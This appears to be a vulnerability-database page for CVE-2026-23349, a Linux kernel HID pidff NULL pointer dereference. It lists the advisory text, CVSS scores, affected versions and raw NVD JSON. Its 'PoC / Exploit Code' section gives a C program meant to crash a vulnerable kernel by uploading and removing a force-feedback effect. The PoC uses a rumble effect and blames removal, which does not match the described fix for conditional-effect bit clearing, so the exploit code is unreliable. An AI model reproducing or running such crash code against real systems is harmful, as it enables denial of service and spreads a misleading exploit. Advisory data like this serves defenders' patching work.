Security Vulnerability Report
CVE-2026-23349 CVSS 5.5 MEDIUM

CVE-2026-23349

Published: 2026-03-25 11:16:33
Last Modified: 2026-04-24 18:06:22
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

HID: pidff: Fix condition effect bit clearing

As reported by MPDarkGuy on discord, NULL pointer dereferences were happening because not all the conditional effects bits were cleared.

Properly clear all conditional effect bits from ffbit

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.18.1, before 6.18.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19, before 6.19.7) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (before commit 97d5c8f5c09a)
Linux Kernel (before commit d1edc027a4b0)
Linux Kernel (before commit ef0e669dbcea)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23349: HID pidff NULL Pointer Dereference
 * Triggering the bug requires interacting with a force feedback device.
 */
#include <linux/input.h>
#include <sys/ioctl.h>   /* declares ioctl() */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char **argv)
{
    int fd;
    struct ff_effect effect;
    const char *device = "/dev/input/event0"; // Adjust device path as needed

    // Open the input device
    fd = open(device, O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    memset(&effect, 0, sizeof(effect));
    effect.type = FF_RUMBLE; // Using rumble effect to trigger ffbit logic
    effect.id = -1;
    effect.u.rumble.strong_magnitude = 0x8000;
    effect.u.rumble.weak_magnitude = 0x8000;

    // Upload the effect to the device
    if (ioctl(fd, EVIOCSFF, &effect) < 0) {
        perror("ioctl EVIOCSFF");
        close(fd);
        return 1;
    }

    // Remove effect to trigger the clearing logic (where the bug exists)
    // The bug occurs when clearing conditional effect bits improperly.
    if (ioctl(fd, EVIOCRMFF, effect.id) < 0) {
        perror("ioctl EVIOCRMFF");
        close(fd);
        return 1;
    }

    printf("PoC executed successfully. If vulnerable, kernel may crash.\n");
    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23349", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:33.197", "lastModified": "2026-04-24T18:06:21.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: pidff: Fix condition effect bit clearing\n\nAs reported by MPDarkGuy on discord, NULL pointer dereferences were\nhappening because not all the conditional effects bits were cleared.\n\nProperly clear all conditional effect bits from ffbit"}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\nHID: pidff: Corrección del borrado de bits de efecto de condición\n\nSegún lo informado por MPDarkGuy en Discord, se estaban produciendo desreferencias de puntero NULL porque no se borraron todos los bits de efectos condicionales.\n\nBorrar correctamente todos los bits de efecto condicional de ffbit"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18.1", "versionEndExcluding": "6.18.17", "matchCriteriaId": "07E9D8CD-82F0-4CC6-8038-BF71758D583C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", 
"versionEndExcluding": "6.19.7", "matchCriteriaId": "69245D10-0B71-485E-80C3-A64F077004D3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18:-:*:*:*:*:*:*", "matchCriteriaId": "DCE57113-2223-4308-A0F2-5E6ECFBB3C23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/97d5c8f5c09a604c4873c8348f58de3cea69a7df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d1edc027a4b0bb4c7a2670b530590b4df6177011", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef0e669dbceaf3d7bb4ae0b235fa61feabd92b0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}